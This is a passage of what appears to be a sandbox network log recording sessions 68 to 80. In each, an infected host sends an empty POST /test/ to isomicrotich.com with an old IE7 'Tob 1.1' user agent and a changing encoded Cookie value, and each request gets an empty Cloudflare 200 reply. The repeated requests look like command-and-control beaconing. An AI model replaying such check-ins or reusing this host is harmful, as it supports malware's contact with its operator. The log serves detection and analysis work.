                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:47:50 UTC542INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:50 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xrlW2uRzFv70cn0np9SKFUjKCBpgscjawFeBQinaCRUw7zhpnmLnjRUjFAI1CxH3TkHrB55O6Vf%2FNTZZOFaJO7huUiIW8rYabiwZX5eIX2%2BThk8XzQ7mCuES1H%2BpbBUc6yhl"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1a5aed4643ec-EWR
                                                                                                                                                                                                                                                2024-10-03 18:47:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                68192.168.2.762377188.114.97.3443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:47:51 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFn6+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:47:51 UTC567INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:51 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UzpuSLhaGCsL9160A%2BIRdj5hAlGxVUsYX8b24b4uL7EQZR0V3xf4H36u4zkrN4XfHiz%2BJ5a5%2B5LvIZYm6piBKhfsuCHTT0lIsOmiTveYY43Dudf3YIqls5PyVykub%2B89SZJV"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1a617ae37cae-EWR
                                                                                                                                                                                                                                                2024-10-03 18:47:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                69192.168.2.762379188.114.97.3443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:47:52 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFn6uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:47:52 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:52 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JgnA8hqhuReTvQ0xkQvHzZm4SFVb%2BhkWoQ94FfkM9N3%2BtHnN7SkqwLxiD9Xb%2Bj8iRVF%2FXB3GWdTl44xatOWsHXhWSvkvjHkKKY%2FibxoOyukfMGC86K6Unqy7VN4Evx07KfdI"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1a6a5b8941ef-EWR
                                                                                                                                                                                                                                                2024-10-03 18:47:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                70192.168.2.762380188.114.97.3443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:47:53 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFm4+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:47:54 UTC542INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:53 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TpwzzbmRBVwUo3cLgSVx5CDthM%2FRe9bUKbQaq3yqjggNjoKnVABWDjPF88PjUPVum966wEBdZhAPvcIQVSzmbXTY3M549STAMbPOsGcs4V6HYFp24t8cdWo%2Bta%2Bkbsns7Hwa"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1a708c62726b-EWR
                                                                                                                                                                                                                                                2024-10-03 18:47:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                71192.168.2.762381188.114.97.3443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:47:54 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFm4uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:47:54 UTC548INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:54 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QQJC5nzh3N%2BNVhiljg8XnhGYfxQU1ej8DZvH%2Bak0tBigv5te9PVGM8uh%2FYjxbZLuhTDDM%2BVezMua1dj4hwDT%2Bkir0Hw26btXJsj%2FyRIzKSe3OU6YfVZGDY0OB9cof31sp7tw"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1a770a524411-EWR
                                                                                                                                                                                                                                                2024-10-03 18:47:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                72192.168.2.762383188.114.97.3443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:47:55 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFm4eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:47:56 UTC548INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:56 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kHQNjTpvqd67qtUi1Num2z0jtt8i%2B%2F%2FajaEbbVVQuDjM4HBGwzvi4zdovjjXSnu22xOBmOagkd1%2FaS%2BNH6zYTipuQ9B4I8OXgp03K2UzdDjh%2FXy59beSY92aokKtvfSZKD44"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1a7dcb760ca8-EWR
                                                                                                                                                                                                                                                2024-10-03 18:47:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                73192.168.2.762386188.114.97.3443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:47:56 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFm4OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:47:57 UTC540INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:57 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=we5kppP9ghDzAt%2BpP0Di2ouX9XFPhInZ3q8imTeCfwbhXSytTmyXHzuMI0oWEbOZAb2nr7wmzcF89JwyycuJn96%2B2Bmbj2XUE7xi9e5mDay2VIUxUFwsKPQFsVlEhfSnJTuF"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1a84efbd4310-EWR
                                                                                                                                                                                                                                                2024-10-03 18:47:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                74192.168.2.762387188.114.97.3443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:47:58 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFm5+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:47:59 UTC548INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:59 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KLw1Q03IXnPYVSrnM4bYtlFs%2BogcfQ%2B8lBitSsHeUXYjrZ9qdQ4FT4YItGauCvCQajEm5FgzzWeHGT5oKenhToYt1BKyB8BKs%2BAtJxJ%2BlOIJGmOFProQfhgcR2k%2BXtP2%2BBlQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1a90a9c5c425-EWR
                                                                                                                                                                                                                                                2024-10-03 18:47:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                75192.168.2.762389188.114.97.3443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:47:59 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFm5uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:48:00 UTC544INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:48:00 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KGeRGHDLuvjZPYiBNdWXjh1eRl7MXhiet3L1rqn3cvOeLQLqLnXdrcdu%2FGnFk3TXFs0XawtGcf%2F8VWGD7xiLg95QXVtvFY3gNMvgk%2BGsY%2FiEuH0H5CoARsTd1SsX0MgbOKc9"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1a987d214399-EWR
                                                                                                                                                                                                                                                2024-10-03 18:48:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                76192.168.2.762391188.114.97.3443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:48:01 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFm5eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:48:01 UTC540INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:48:01 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SfUYnmZyqldtmEEyouXGpsHYLO1p0pfH3m9lOA18S6wb1%2BeXKtYfwqZV%2FLhVfC5uQhu0LAhzbAVPcPucNxC8hi6t7AqLA7b1isUiPQHQEwbIZ3pZOgrHB2jPq5aeHltPF0Uh"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1a9f382a4376-EWR
                                                                                                                                                                                                                                                2024-10-03 18:48:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                77192.168.2.762393188.114.97.3443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:48:02 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFm5OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:48:02 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:48:02 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e3dbaOJT%2FBKvJrXbj9DniDxDz1qzEuEjeM1wzBDw7%2FeRr3Igb%2FymXKRzuW2945t0V7ZFISY90BsctRPwaywvTM5YHl7kBTExrd5W3SkDANzn6EEIRLmRoXd9%2BjRXec%2FDlkvF"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1aa5bc3843ca-EWR
                                                                                                                                                                                                                                                2024-10-03 18:48:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                78192.168.2.762394188.114.97.3443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:48:03 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFm6+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:48:04 UTC546INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:48:04 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pYS0tiAfEHiOiFtP%2FUdEdWRZsN%2BccVG4e5Au%2B0ti6OaUkSQv9C4bJXlxbDMXj6RG6%2B9DmMPeLN5A2wOnFc98BUzVJOwlm%2FuGKZ7UEgelYCH9V0GD8EzGRjLRxNwgLV2A0ch9"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1ab0ae965e62-EWR
                                                                                                                                                                                                                                                2024-10-03 18:48:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                79192.168.2.762395188.114.97.3443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:48:04 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFm6uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:48:05 UTC577INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:48:05 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9DYXV4Hi1jrTDrY3uaokRrLRXKuGPC7g9v0bQwTctFQTIm2Z%2BaXpNsiGlgduNHA%2BeidVICwVHJt%2F%2Byf7D1eO%2By5nEIE3O9Znpf6JrD02hxZQ9VmrMV5d%2F1oBVn%2F5eOKO%2F2j%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1ab72c804388-EWR
                                                                                                                                                                                                                                                2024-10-03 18:48:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                80192.168.2.762396188.114.97.3443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:48:05 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
